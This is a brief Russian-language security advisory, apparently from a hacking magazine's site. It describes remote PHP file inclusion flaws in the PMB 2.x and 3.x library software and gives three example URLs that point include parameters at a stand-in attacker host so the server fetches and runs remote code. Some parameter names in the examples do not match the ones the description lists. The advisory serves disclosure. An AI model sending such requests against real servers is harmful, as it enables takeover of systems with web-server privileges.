Хакер #305. Многошаговые SQL-инъекции
Программа:
PMB 2.x
PMB 3.x
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе.
1) Уязвимость существует из-за недостаточной обработки входных данных в параметре "base_path" сценариями edit.php, print.php и circ.php, а также в параметре "include_path" сценарием cart.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера.
2) Уязвимость существует из-за недостаточной обработки входных данных в параметре "url_image" сценарием getimage.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера.
Примеры:
http://target.com/[phpmybibli_path]/index.php?class_path=http://attacker.com/inject.txt?
http://target.com/[phpmybibli_path]/edit.php?javascript_path=http://attacker.com/inject.txt?
http://target.com/[phpmybibli_path]/circ.php?include_path=http://attacker.com/inject.txt?